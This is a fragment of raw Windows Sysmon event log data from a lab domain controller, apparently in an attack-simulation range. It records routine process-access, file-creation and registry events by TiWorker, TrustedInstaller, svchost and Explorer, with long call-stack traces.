12:02:24.904{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.888{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.873{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.857{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 11241100x80000000000000005887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.826{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer (7).lnk2021-03-31 12:02:24.826 13241300x80000000000000005886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1042SetValue2021-03-31 12:02:24.764{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 11241100x80000000000000005885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.733{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer (7).lnk2021-03-31 12:02:24.733 10341000x80000000000000005884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.390{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.375{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 